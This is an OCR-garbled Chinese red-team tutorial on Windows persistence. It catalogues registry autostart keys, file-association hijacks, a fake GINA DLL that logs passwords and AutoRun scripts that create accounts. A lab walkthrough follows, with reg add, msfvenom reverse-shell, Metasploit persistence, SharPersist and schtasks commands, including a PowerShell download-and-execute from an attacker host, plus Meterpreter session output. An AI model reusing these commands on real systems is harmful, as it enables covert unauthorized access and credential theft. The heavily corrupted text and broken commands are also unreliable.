网 程序 /启动 "中 有 新 增 的 项 ， 可 以 右 击 它 选择 ' 查 找 目标 "到 相应 的 文件 的 目录 下 查看 一 
件 路 径 为 系统 目录 就 要 多 加 小 心 了 。 也 可 以 在 注册 表 中 直接 查看 ， 它 的 位 置 为 


JRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders ， 键 
Upo 

ogon\shell 在 以 下 键 值 位 置 : 

4 

OCAL_MACHINE\SHOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon 


建 人 在 Explorer.exe 的 后 面 加 上 我 们 程序 的 路 径 这 样 我 们 的 程序 就 可 以 随 系统 启动 了 。 
jiwindows\system32\ 下 有 个 hehe.exe 木 马 。 


MMAND 的 AUTORUN 利用 CMD.EXE 的 autorun: 


OCAL_MACHINE\SOFTWARE\Microsoft\CommandProcessor 下 面 建 一 个 字 串 

UN， 值 为 要 运行 的 .bat 或 .cmd 文 件 的 路 径 ， 木 马 可 以 加 载 在 AUTORUN 键 值 下 。 这 样 在 运 
命令 的 时 候 一 起 加 载运 行 。 

J、 如果 需要 运行 .dll 文 件 ， 则 需要 特殊 的 命令 行 : 
32.exeC:\WINDOWSIFILE.DLL,Rundll32 2、 解 除 这 里 相应 的 自 启动 项 只 需 删 除 该 键 值 即 
注意 不 要 删除 系统 键 值 3、 如 果 只 想 不 启动 而 保留 键 值 ， 只 需 在 该 键 值 加 入 rem 即 可 : 


M indows\a.exe” 
ystem\Shell 


T URRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System 键 值 名 
hiell， 下 面 的 数据 为 启动 文件 名 。 

ystem\Scripts 下 Logoff(Logon) 刍 值 注意 以 下 分 支 的 Logoff(Logon) 键 值 可 能 加 载 文件 : 
CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts 

LOCAL MACHINE\Software\Policies\Microsof\Windows\System\Scripts 


Wppinit_DLLs 键 值 在 以 下 位 置 : 

^ OFTWARE\MICROSOFT\WINDOWSNT\CURRENTVERSION\WINDOWS, 

^ WBAPPINIT DLLS, —EÉDLLAK Es] AER NAE LER, AARRE A 
已 理 器 中 看 到 。 如 求职 信 病 毒 就 是 让 系统 执行 DlIlMain 来 达到 启动 木马 的 目的 ， 因 为 它 是 

引 油 入 的 ， 对 这 个 DLL 的 稳定 性 有 很 大 要 求 ， 稍 有 错误 就 会 导致 系统 崩溃 ， 所 以 很 少 看 到 这 种 
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16. bootexecutes£ B 在 以 下 位 置 : HKLM\SYSTEM\CONTROLSETOOLSESSIONMANAge 
面 ， 有 一 个 名 为 bootexecute 的 多 字符 键 值 ， 默 认 数值 是 : autocheckautochk* 


17. Winlogon\Notify fi & : 
HKLMYSOFTWAREMICROSOFTWINDOWSNTICURRENTVERSIONWINLOGONYNOTIE [ 
位 置 也 需要 特别 的 留意 。 


18. RunOnceEx XP 操作 系统 ， 还 需要 检查 一 下 
HKEY LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx 键 值 人 
的 内 容 


19, Explorer\shellfolders#lusershellfolder 


以 下 四 个 键 值 位 置 需 要 注意 : 
HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELLFOLD 
S 
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\SHELLFOLD 
S; 

HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\USershellfolder 
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\Usershellfolder 


20. ShellServiceObjectDelayLoad 以 下 注册 表 分 支 : 
HKEY LOCAL MACHINEYSOFTWAREMicrosoftWindowsCurrentVersionlShellServiceObjectDe 
ayLoad 下 可 能 有 可 疑 键 值 。 


二 、 文 件 关联 所 涉及 的 注册 表 键 


1、EXE 文 件 关 联 另外 [HKLMN\Software\classes\exefile\vshellopen\commandy 键 值 也 可 能 用 来 加 载 
木马 ， 比 如 把 键 值 修改 为 "X:\Wwindows\system\ABC.exe"%1'"%"。 这 里 的 意思 是 : 更 改 文件 的 打开 方 
式 ， 这 样 就 可 以 使 程序 跟随 您 打开 的 那 种 文件 类 型 一 起 启动 。 举 例 来 说 ， 打 开 注 册 表 ， 展 开 注册 表 
到 HKEY_CLASSES_ROOT\exefile\shellopen\command， 这 里 是 exe 文 件 的 打开 方式 ， 默 认 键 值 
7g: "9%1"%x*。 如 果 把 默认 键 值 改 为 Trojan.exe"%1"%*， 您 每 次 运行 exe 文 件 ， 这 个 Trojan.exe 文 件 
就 会 被 执行 。 木 马 灰 鸽子 就 采用 关联 exe 文 件 的 打开 方式 ， 而 大 名 易 易 的 木马 冰河 采用 的 是 也 与 此 
相似 的 一 招 一 一 关联 txt 文 件 。 


关联 表 : 


[HKEY CLASSES ROOT\exefile\shell\open\command]@=\"%1\"%* 
[HKEY CLASSES ROOTcomfileihellopencommand]-Y'961Y'96* 
[HKEY_CLASSES_ROOT\cmdfile\shell\open\command]@=\"%1\"%* 
[HKEY CLASSES ROOTIbaffile\shell\open\command]@=\"%1\"%* 
[HKEY_CLASSES_ROOTIhtafile\shell\open\command]@=\"%1\"%* 
[HKEY_CLASSES_ROOTIpiffile\shell\open\command]@=\"%1\"%* 
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LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command|@=\"%1\"%* 
LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]@=\"%1\'%* 
| OCAL_MACHINE\Software\CLASSES \htafile\shell\open\command]@=\"%1\"%* 
LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]@=\"%1\"%* 
AS hell\Edit\Command%SystemRoot%\System32\Notepad.exe%1 
a\Shell\Open\Command%SystemRoot%\System32\WScript.exe"%1"%* 

À hell\Open2\Command%SystemRoot%\System32\CScript.exe"%1"%* 
ell\Edit\Command%SystemRoot%\System32\Notepad.exe%1 

s ell\Open\Command®%SystemRoot%\System32\WScript.exe"%1"%* 
\Shell\Open2\Command%SystemRoot%\System32\C Script.exe"%1"%* 

e Shell\Edit\Command%SystemRoot%\System32\Notepad.exe%1 

i le\Shell\Open\Command%SystemRoot%\System32\WScript.exe"%1"%* 

le \Shell\Open2\Command%SystemRoot%\System32\C Script.exe"%1"%* 
le\Shell\Edit\Command%SystemRoot™%\System32\Notepad.exe%1 
le\Shell\Open\Command%SystemRoot%\System32\WScript.exe"%1"%* 
ile\Shell\Open2\Command%SystemRoot%\System32\CScript.exe"%1"%* 
\Shell\config\Command%1 
a\Shell\install\Commandrundli32.exedesk.cpl,InstallScreenSaver%l 
\Shell\Open\Command"%1'"/S 





| 1\) 
\Shell\printto\Command%SystemRoot%\system32[notepad.exe/pt"%1'"%2""%3"%4] 
Mngtepad\.exe/pt"%1""%2""%3""%A\)" 

! hell\open\Command%SystemRoot%\system32\NOTEPAD.EXE%1 
\Shell\Open\Command%SystemRoot%\System32\NOTEPAD.EXE%1 
\Shell\print\Command%SystemRoot%\System32[NOTEPAD.EXE/p%1] 

WNOTEPAD. E XE/ ) chm. file\Shell\open\Command"C:\WINNT\hh.exe"%1 


;MD.EXE 关 联 在 执行 CMD.EXE 命 令 时 ， 可 以 顺便 执行 附带 的 程序 文件 : 存放 位 置 : 
M\Software\Microsoft\CommandProcessor\AutoRun 

EMEN oen HKEY odie 
3) EN oc D 格 式 来 启动 cmd 和 Lexezi 3 
PRAISE 0073 


木马 后 门 加 载 为 系统 服务 所 涉及 的 注册 表 键 值 


BART: 有 些 木马 是 通过 添加 服务 项 来 实现 自 启动 的 ， 大 家 可 以 打开 注册 表 编 辑 器 ， 在 
EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices] FÆ} 
ERE, HE [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\| FS B] E 
to 通过 更 直接 的 管理 界面 操作 : 在 “运行 "中 输入 “Services.msc” 打 开 服 务 设置 窗口 ， 里 面 显 示 
统 中 所 有 的 服务 项 及 其 状态 、 启 动 类 型 和 登录 性 质 等 信息 。 找 到 木马 所 启动 的 服务 ， 双 击 打开 
把 启动 类 型 改 为 "已 禁用 "， 确 定 后 退出 。 通过 注册 表 进 行 修改 ， 依 次 展开 
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“HKLM\SYSTEM\CurrentControlSet\Services\ 服 务 显示 名 称 " 键 ， 在 右边 窗 格 中 找到 二 进 制 什 
“Start"， 该 数值 内 容 记 录 的 就 是 服务 项 目 驱 动 程序 该 在 什么 时 间 被 加 载 ， 修 改 它 的 数值 数 : “gS 
BOOT 状 态 ,“1" 表 示 SYSTEM 启 动 ，“2" 表 示 自 动 启动 ，"3" 表 示 手动 方式 加 载 ，"4" 表 示 已 禁用 。 尖 
然 最 好 直接 删除 整个 主键 ， 平 时 可 以 通过 注册 表 导 出 功能 ， 备 份 这 些 键 值 以 便 随 时 对 照 。 


2、 安 全 模式 启动 : 当 系统 启动 到 “安全 模式 "和 “命令 行 安全 模式 "时 ， 所 启动 的 服务 列表 可 以 在 下 症 
的 注册 表 键 得 到 : 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal 当 系 统 启动 到 
“有 网 络 的 安全 模式 "时 ， 所 启动 的 服务 列表 可 以 在 下 面 的 注册 表 键 得 到 : 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network 


四 、 木 马 加 载 为 系统 驱动 所 涉及 的 注册 表 键 值 


KEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\ 的 位 置 上 有 这 样 的 地 址 。 该 地 
址 是 系统 启动 VxD 驱 动 文件 放置 的 地 址 ， 就 像 PrettyPark 这 个 蠕虫 一 样 ， 可 以 建立 一 个 主键 之 后 把 
VxD 文 件 添加 到 注册 表 中 在 这 里 。 ER: 不 可 以 直接 把 一 个 EXE 文 件 改 名 为 VxD 文 件 ， 需 要 另外 进 。 
行 编程 ， 生 成 的 VxD 文 件 。 


五 、 恶 意 脚 本 加 载 为 配置 所 涉及 的 键 值 


写 一 个 guest.vbs 文 件 ， 启 动 时 创建 一 个 帐号 或 者 激活 guest 用 户 或 者 tsinternetuser 用 户 。 在 
[HKEY LOCAL MACHINESoftwareMicrosoftiCommandProcessor] FX z 


— Jm 


"AutoRun"="C:\ProgramFiles\guest.vbs" 这 样 运行 cmd.exe 就 会 运行 脚本 guest.vbs 程 序 了 。 







六 、GINA 启 动 可 疑 程序 所 涉及 的 键 值 


GINA(Graphicalidentificationandauthorization 图 形 化 认证 和 授权 ) 就 是 那个 三 键 登 录 ， 作 用 是 计算 机 
用 户 和 WIN 系统 认证 之 间 的 中 间 人 。 ARMEVIDSTROM 程 序 : 
HKLM\software\microsoft\windowsnt\currentversion\winlogon\ginadlI=REG_SZ:fakegina.dil 这 个 
fakegina.dll 就 会 在 三 键 登录 时 候 将 帐户 信息 写 到 文本 文件 的 ， 原 来 的 正常 程序 是 MSGINA.DLL 文 
件 。 


七 、 进 程 的 骨 溃 调试 所 涉及 的 键 值 


HKLM\software\microsoft\windowsnt\currentversion\aedebug debugger= 程 序 骨 溃 时 候 运 行 的 调试 
器 名 字 AUTO1= 立 即 运行 调试 器 ，0= 首 先 询问 用 户 。 默认 情况 下 缺 省 配置 是 
AUTO=1DEBUGGER=DRWTSN32.EXE 
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TH 


REET, 在 红 蓝 对 抗 中 是 最 常见 的 手法 ， 这 种 持久 化 的 手法 在 很 多 半自动 化 后 渗透 
工 了 这 种 支持 ， 比 如 Metasploit、Empire 和 SharPersist 等 一 系列 工具 。 


(win 7) : 172.16.194.135 


| (ubuntu 18) : 


JRR 


g 命令 进行 更 改 注 册 表 进行 添加 启动 项 。 


HKEY CURRENT USERNSoftwareMMicrosoftNWindowsNCurrentVersionNRun" /v 
tlab /t REG SZ /d "C:NtmpNpayloadi.exe" 


"HKEY CURRENT USERNSoftwareNMicrosoftNWindowsNCurrentVersionNRunOnce" /v 
Stlab /t REG SZ /d "C:\tmp\payload1.exe" 


dc "HKEY CURRENT USERNSoftwareMMicrosoftNWindowsNCurrentVersionNRunServices 
Stlab /t REG SZ /d "C:\tmp\payloadi.exe" 


| "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices 
Stlab /t REG SZ /d "C:\tmp\payloadi.exe 
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Uninstall 
WinTrust 


| 计算 机 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 





WeirdBird@O?>reg add “HKEY CURRENT _USERNSof tware Microsoft Windows Curr 
nNRun" /v Pentestlab /t REG_SZ Ad “"C:\tmp\payloadt.exe' 


MERON EN. 
目标 主机 重启 后 ， 成 功 上 线 。 


[*] Sending stage (206403 bytes) to 172.16.194.135 
[x] Meterpreter session 4 opened (172.16.194.136:12345 -> 172.16.194.135:49163) at 2019- 


meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 


meterpreter 
meterpreter 


meterpreter 
meterpreter 


meterpreter 


: 


V V V V V VV VV V VV V VV VVVVVVvVVVVVV 


: 
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7512 created. 


1 created. 
«t windows [?33 6.1.7601] 













"ECHCUP 
m 下 的 注册 表 维权 
i 已 经 提 权 ， 获 得 了 最 高 system 权 限 ， 想 把 权限 维持 在 所 有 用 户 都 能 够 触发 ， 那 么 只 需要 关 
注册 表 即 可 。 


add "HKEY LOCAL MACHINENSoftwareMMicrosoftNwWindowsNCurrentVersionNRun" /v 
testlab /t REG SZ /d "C:NtmpNpayloadi.exe" 


J add "HKEY LOCAL MACHINENSoftwareMMicrosoftNWindowsNCurrentVersionNRunOnce" 
Pentestlab /t REG SZ /d "C: NtmpNpayloadi.exe" 


Y_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v 
testlab /t REG_SZ /d "C:\tmp\payloadi.exe" 


ig add 
IKEY_LOCAL_MACHINE\Sof tware\Micr osof t \Windows\Cur rentVer sion\RunServicesOnce" 
y Pentestlab /t REG SZ /d "C:NtmpNpayload1.exe" 








OEMinformation zh E» 数据 
OOBE ab (BEL) REG_SZ 次 值 未 设置 ) 
OptimalLayout 













>d Pentestlab REG_SZ C:\tmp\payloadl.exe 
cona ab VMware User... REG SZ “C:\Program Files VMwareWMware Tools\vm... 
Personalization 
PhotoPropertyHandler 
i | PnPSysprep 
Policies 
PreviewHandlers 
PropertySystem 
Reliability 
| ! RenameFiles 
Run 


RunOnce 





3 一 个 普通 用 户 o 
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eG > 控制 面板 用 户 帐 产 和 家 庭 安全 » BORE > 管理 帐户 BEES 






| weirdbird-test 
| tem | 
Eau 








主机 重启 后 任意 用 户 都 可 以 成 功 上 线 。 





应 用 程序 进程 


BRR HT 






































esras. exe oa 
dun, exe weird 01 Amonas 
explorer, exe weird o0 Windows 资源 管理 器 
iNodeCmn, exe 00 
iNodeImg. exe 00 hj AR 
iNodeSec, exe 00 809 Microsoft Corporation 
iNodeSslvpn exe 00 
payl odi: exe 4. 00 peyloadt Yd e 
j| —SefüMgrlite, exe #32 weird 00 360 软 件 小 助手 
| taskhost, exe weird 00 Windows 任务 的 主机 进程 
| taskner. exe weird 00 Windows 任务 管理 器 
| vntoolsd. exe weird 00 Wware Tools Core Servi: 
| | winlogon exe 00 


y SAR Pa G) SARIS ©) | 
| | 
| igo. 55 CPU SAE: 1% WAE 
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jing stage (206403 bytes) to 172.16.194.135 


erpreter session 5 opened (172.16.194.136:12345 -> 172.16.194.135:49169) at 2019-12-2 





管理 员 利用 载 入 dll 维权 。 






enom -p windows/x64/meterpreter/reverse tcp LHOST=172.16.194.136 LPORT=1234 


g add "HKEY LOCAL MACHINENSOFTWAREMMicrosoftNwWindowsNCurrentVersionNRunOnceExV 
ntestlab /t REG SZ /d "C:NtmpNpayloadi.exe" 


Dual 上 线 
Po add "HKEY LOCAL MACHINENSOFTWAREMMicrosoftNindowsNCurrentVersionNRunOnceEx^ 
I "C: NEmpNpayload.d11" 


E > 
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A | 启动 信息 | 系统 杂项 | 电脑 体检 E | AT E 
j ae ~ m amanan Ww " jd c 
— 


ovunib 
进程 | 驱动 模块 | es | 内 核 鬼子 | 应 





和 名 








6.1.76011 
oft Corporation, {F 






eEDCPEDLEDEDELEBE 


rdBird88?5reg add "HKE? LOCAL .MACHIN 
^s ion NRunOnce Ex Bai Depend” Au Pentestlab /t REG. SZ 


ome | sers WeirdBirdgð?>» 


DCDEEPDLDECELU 


# J Teleph 
LL] ThemeManager 


重启 后 也 成 功 上 线 








Sending stage (206403 bytes) to 172.16.194.135 
Meterpreter session 1 opened (172.16.194.136:12345 -> 172.16.194.135:49165) 


meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 
meterpreter 


V V V V V NV V V NV N N N 


Metasploit 维权 利用 方式 


persistence 模块 


1: 生成 vps 脚本 的 形式 


run persistence -U -P windows/x64/meterpreter/reverse tcp -i 5 -p 443 -r 172.16: 


> 
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\ persistence -~U -P windows/x64/meterpreter/reverse tcp -i 5 -p 443 ~r 172.16.194.136 


scripts are deprecated. Try exploit/windows/local/persistence. 
exploit/windows/local/persistence OPTION=value [...] 
stence Script 
le for cleanup created at /home/weirdbird607/.msf4/logs/persistence/WIN-U8NO9PHAQ40, 20191228. 4632/WIN-UBN@9PHAQ40_20191228 , 4632. rc 
load-windows/x64/meterpreter/reverse tcp LHOST=172.16.194.136 LPORT=443 
agent script ís 10867 bytes long 
pt written to C:\Users\WEIRDB~1\AppData\Local\Temp\pFedjB. vbs 
cript Users\WEIRDB~1\AppData\Local\Temp\pFedjB.vbs 
ed with PID 448 
o autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ LAAXqTmDmWA rtN 
autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ LAAXqTmDmWArtN 






到 生成 vbs 脚本， 同样 的 老 套 路 ， 自 动 更 改 注册 表 添 加 启动 项 进行 权限 维持 。 


Le 
REG. SZ adco 
AAXqTmOmW... REG SZ CAUsersW 
































RunOnce 


Screensavers R 





NEIRDB~L\AppData\Local\Temp\pFedja.vbs 
Shell Extensions 


Sidebar 





ele 





| ThemeMenager 


Themes 


pred ws. EN (089 eS) 
SOG) WAE ARO) BS) EH) 
Function FZFvIHoQmoS laEzfteMxpioH = 
AARAAAAAAAAAAAAAAAAAAAAAAAAARAAAAADAAAB g AAAAAAA AAAAANANAAAARRA RAAM AAAAAA jad 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAABAABAAAAAAAAABABARAAAARAAAARARARAARA AAABAAAAAAABAAAAAAAAABAAAAAAAAAAAAAALAAAAAAAAAAS 
AAAAAAAAAAARAAAAAASAAAABAAAAAAAAAARAARAASAAAAAAAAAABAAAAAAAAAARAAABAAAAAAAAAAAAAASAAAAAASAAASAAAAAALAAAAAAAARARAAAAAAAAAAAAAAAAAAA | 
|| AAAAAAAAAAAAAAAAAAAAAAARARAAAAAAAAARAAAAAAAAAAAAAAAASAAAAAAAAAAAAAAAAAAAAASAAAABAAAAAAAAAAAAAAAAAAAAAAAASARAAARAAABAAAAAARAAAAAAAA 
AAAAAAARAAAAAAAAARAAAAAAAAAAAAASAAAAARAAAASAAAAAAAAAAAAAAAARAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAARAABAAAAAAARAABAA 
AAAAAAAAAAAAAAAAAAAAAAAAAASARAAAAAAAAAAAAAAAAAAAARARAAAAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAARAAAAAAABARAR 
AAAAAAAAAAAAAAAAAAAABAAAAAAAAAABASAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAARAAAABAAAAAAABAAARAAAAAAAAA 
ABABAABAABABAAAAAAAAAAAAA AAAAAAABAABAAAAAAARAARAAAAAAAAASAASAARAAAAAAAAAAAAAAAAAAAAAAAAAARAAAAAAAAAAAAAAAAAARAAAAAABAAAAAAAAAAAARA 
/1Ui JwOn] OOxyUm]S GAtnIX//VSAHDSCnOSI X2 deFB/*cAAAARAAAASEEAAAAAAAD//// /CETARAAWANAAAAANAAAAAAAAAAAAAAAAAAAAADZ 
Pnl = kPmDNwTXdy baVGfOIpACUBecD. GetTempName () be VGfOIpAL c sr 站 qzPnI) egeXELTJy = 
tllKbzloZyVIus 
WScript.Sleep 5000] 
Loop 











ft-con:datatypes" & Chr (34) 
KAR AAAAAAAAAAAAAAAAL 











































Run Et em 
RunOnce "m REG. 2 
lAAXqTmOmW.. REG SZ L\AppData\Local\Temp\pFedj8.vbs 
f Li 
pFedjB.vbs - 记事 本 , es) | 


SSF) wa) WO GRO) MH) 
Function F2Fv1Hot 3 


















AAAAAAAAAAAAAAAAA x 3 V4dAAAAE 4 d | 
AAAARAAAAAANAAARAA, VAR AAAAAAAAAAAA AAAAAAAAAL 
AAARAAAAAAAAAAAAAAA 1 y AAAAAAAAAAAAAAAAAAAAA 
ARAAAAAAAAAAAAAAA AR, 1 LAA! AAAAR, AAA 


AAAAAAABAAAA EUR 


RAM AAAAAAARAR V 


A 
AA 
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use post/windows/manage/persistence exe 
set REXEPATH /tmp/payloadi.exe 

Set SESSION «session number» 

set STARTUP USER 

set LocalExePath C:NNtmp 


Id Name Type Information 


4 meterpreter x64/windows WIN-UBNG9PHAQ4D\WeirdBirde07 @ WIN-USNOSPHAQ4D  172.16.194.136:12345 -> 172.16.194.148:49346 (172.16.194,148) 


imsf5 exploit (i 

msf5 exploit{ 

msf5 exploit( 

msf5 exploit( 

msf5 exploit( 

msf5 exploit( 

msf5 exploit( i i use post/windows/manage/persistence exe 
msf5 post( ) > set REXEPATH /tmp/payloadl.exe 
REXEPATH => /tmp/payload1. exe 

msf5 post (x » ) » set se 

set servicedescription set session set sessionlogging 
msfS post (windows e'persist } > set session 4 

session => 4 

msf5 post (windows per t ) » show options 


Module options (post/windows/manage/persistence exe): 


Name Current Setting Required Description 

REXENAME default.exe The name to call exe on remote system 

REXEPATH /tmp/payload1.exe The remote executable to upload and execute. 
SESSION 4 The session to run this module on. 

STARTUP USER Startup type for the persistent payload. (Accepted: 


msf5 post(wine e exs) > set startup user 
The following options failed to validate: Value 'user' is not valid for option 'STARTUP'. 

startup => USER 
imsf5 post(wind exe) » set lo 
set localexepath set loglevet 
imsf5 post(windo 1n398/; istence exe) > set localexepath C:\\tmp 
localexepath => C: 
Imsf5 post (windows e /pe stence exe) > run 


s| Running module against WIN-U8N@9PHAQ4D 

| Reading Payload from file /tmp/payload1.exe 
Persistent Script written to C:\tmp\default.exe 

| Executing script C:\tmp\default.exe 
Agent executed with PID 4604 

«} Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kNzC ruKMEVW 
Installed into autorun as HKCUNSoftwareMMicrosoftNWindowsXCurrentVersionNRunNkNzC ruKMFVW 


Cleanup Meterpreter RC File: /home/weirdbird007/.msf4/logs/persistence/WIN-UBNO9PHAQ4D 20191228.5723/WIN-UBNBSPHAQ4D 20191228.5723.rC 


Post module execution completes 


msf5 post( 


USER, SYSTEM, SERVICE) 





+S v Seti 
Pe ad TEA PT 
" 
th icm Cg 
EFR 履 改 日 期 












INodeSetup0 2019/12, 
© | default.exe 2019/12 
5, payload.dll 2019/12, 


=| payloadi.exe 2019/12, 


FF ersist 维 权利 用 方式 


a 
sist 是 FireEye 红 队 开源 的 一 款 用 C# 编 写 的 命令 行 工 具 ， 可 以 反射 性 的 加 载 Cobalt Strike 的 
iesassembly" 命 令 或 任何 其 他 支持 反射 性 加 载 .NET 程 序 集 的 框架 。 (目标 机 器 需要 预 装 .net 
jord 框架 4.0 以 上 版 本 。) 


Persist 套装 介绍 


E 
k 
@ 
i 
[i 
E 
n 





SharPersist f£ ey 1 p NTE RMN ME 
DESI 


'ersist 维权 利用 
户 维权 利用 


arPersist -t reg -c "C:NindowsNSystem32Ncmd.exe" -a "/c 
“mp\payload1 .exe" -k "hkcurun" -v "pentestlab" -m add 
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ry Key: HKCUSSof tuare Microsoft Windows NCurrentUerz ion Run 
Value: pentestlab 






ime 





Option: 
Internet Settings 


Registry persistence added 


leirdBird887*Desktop? 





Sidebar 










\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 


SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c 
C:NtmpNpayloadi.exe" -k "hklmrun" -v "pentestlab" -m add -o env 





ystem32Xcmd.exe" -a 


C: Nisers We irdBird@@7\Desktop>SharPersist -t reg -c "C: Windows \System32\cnd.exel 
-a “yc C2N\tmp\payloadi.exe" -k “hkimrun"” -u “pentestlab” -m add -o enu 


INFO: Adding registry persistence 

INFO: Command: Windows SS ysten32\cnd.exe 

INFO: Command frgs: 7c C:\tmp\Npayloadi.exe 

INFO: Registry Key: HKLMSSoftware Microsoft Windows CurrentUers ion NRun 
INFO: Registry Value: pentestlab 

INF Option: env 


ndows\ 


B 





其 他 的 利用 方式 可 参考 reg 命令 的 利用 方式 ， 这 里 就 不 一 一 演示 了 。 
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started reverse TCP handler on 172.16.194.136:12345 


Sending stage (206403 bytes) to 172.16.194.137 
Meterpreter session 5 opened (172.16.194.136:12345 -» 172.16.194.137:49165) at 2019-12-2 


terpreter > 
[neterpreter > 





有 十 变 万 化 ， 知 其 原理 ， 一 切 不 难 
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windows 权限 维持 篇 2- 计 划 任 务 维权 
前 


这 章 内 容 ， 与 大 家 探讨 从 计划 任务 这 个 特性 进行 维权 的 利用 。 


windows 中 schtasks.exe 是 安排 命令 和 程序 定期 运行 或 在 指定 时 间 内 运行 。 从 计划 表 中 添加 和 删除 
任务 ， 按 需要 启动 和 停止 任务 ， 显 示 和 更 改 计 划 任 务 。 


Tii 


参数 列表 

/Create 创建 新 计划 任务 。 
/Delete 删除 计划 任务 。 

/Query 显示 所 有 计划 任务 。 
/Change 更 改 计划 任务 属性 。 

/Run 立即 运行 计划 任务 。 

/End 中 止 当前 正在 运行 的 计划 任务 。 
/? 显示 帮助 /用 法 。 


schtases 维权 利用 


msf 生成 马 ， 开 启 一 个 web 模块 ， 然 后 schtases 命令 创建 定时 任务 powershell 开启 远程 下 载 并 执行 





schtasks /create /tn PentestLab /tr "c: NwindowsNsystem32NindowsPowerShellWwi.0V 


r 


接着 schtasks.exe 添 加 定时 任务 
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may ra 
GENUS ^ 
] emnes 












次 重启 后 ，shell 都 能 触发 上 线 





Sending stage (206403 bytes) to 172.16.194.141 
Meterpreter session 7 opened (172.16.194.133:12345 -> 172.16.194.141:49190) at 2019-12-2 


terpreter 
reter 
rpreter 
preter 
terpreter 
terpreter 


EEH: 









/ereate => 创 建 任务 

/tn "test" => 指 定 任务 名 称 为 test 

b. C:\Windows\client.exe => 指 定 程序 路 径 

{sc MINUTE /mo 1 => 指 定 类 型 ; MINUTE 表 示 任 务 每 n 分 钟 运行 一 次 ，/mo 1 表示 每 1 分 钟 执行 一 次 
dra "System" => 指 定 为 System 用 户 运 行 该 任务 


型 RE HIGHEST ”=> 运行 级 别 ，HIGHEST 为 使 用 最 高 权限 运行 
> 
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比如 : 每 30 分 钟 运行 一 次 
(30 分 钟 执行 一 次 ) 


schtasks /create /tn PentestLab /tr “c:\windows\system32\WindowsPowerShell\v4 gi 
/sc onidle /i 30 


定时 某 个 时 间 点 运行 触发 


(指定 时 间 执 行 ) 





schtasks /CREATE /TN "windows Update" /tr "c:\windows\system32\windowsPowerShe] 
/SC minute /MO 1 /ED 2019/12/30 /ET 00:00 /Z /IT /RU %USERNAME% 


当然 ， 如 果 不 喜 欢 命令 行 的 话 ， 也 可 以 直接 在 计划 任务 使 用 gui 面板 进 行 编辑 ， 留置 后 门 程序 


vrina 


xS BYEIA) sav RH 

















Pentestlab WESS 
Windows LU. 正在 运行 





的 14:37 31-85 , TRR 00:01:00 重复 一 次 。 MARE 2019/12/20 0:00:00 81:288, — 2019/12/30 000-01 2019/12 


Microsoft 


WP8 


Windows Update TENEH REUS, 











SQ eee X^ sh “设置 One2RUCEA) - a 
SEN, LÜMschaveDESNUAG. be 
= | LI 
2 mauu i ; A 
SENE chwindowssystem32WindowsPowerShellw1.Owpowershell.exe (nev TER 4 
» 8c 
a X 
aii LE i 
DUES Sr TNE. | s 
+ e 
R20: BIRF ix Be 
ES | 
s |g "e 
WEE) | 
Awindowsisystem32wWindowsPowerShelhvl.OWpow | — SER). 


NOI TSA: { s | 


BaF Tsim. | 
FEN. | mo. p 


| | 


C: \Users WieirdBird@@?>schtasks /CREATE /TN “Windows Update” /tr “c:\windous™sys 
tem32 \WindowsPowerShe1l1\wi.@\powershell.exe (neu-object System.Net.WebClient>? -D 
wnloadPile¢’http:/77172.16 .194.133/payload2.exe’.’c:/tmp/test exe’ )3start—proces 

t:/tmp/test.exe''" /SC minute /MO 1 /ED 2019/12738 /ET 08:800 /Z “IT /RY XUSERN 


MEZ 











> 


ALTA ETRE "Windows Update". 
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p 较 猥 (y) Bi (shu) 的 姿势 ， 比 如 当 某 个 windows 的 事件 id 触发 了 ， 那 么 这 个 定时 任务 


€ ZIM OnLogOff /TR C:NtnpNpagloadi.exe /S 5 FE iNodesetup0 
evel=4 or Level=@) an vent 1D=4634)> 11" RE EX payload.dil 
FS aes =  payloadLexe 
* testexe 
B 
d 
Bux 
» BA 
de 


DEEHRPEUNIRSURSR, TEAU Rb SHTML SD 


1333 











Command: 

onnand Arg 

Scheduled T 
INFO: Option: logon 


重启 后 ， 依 旧 上 线 。 


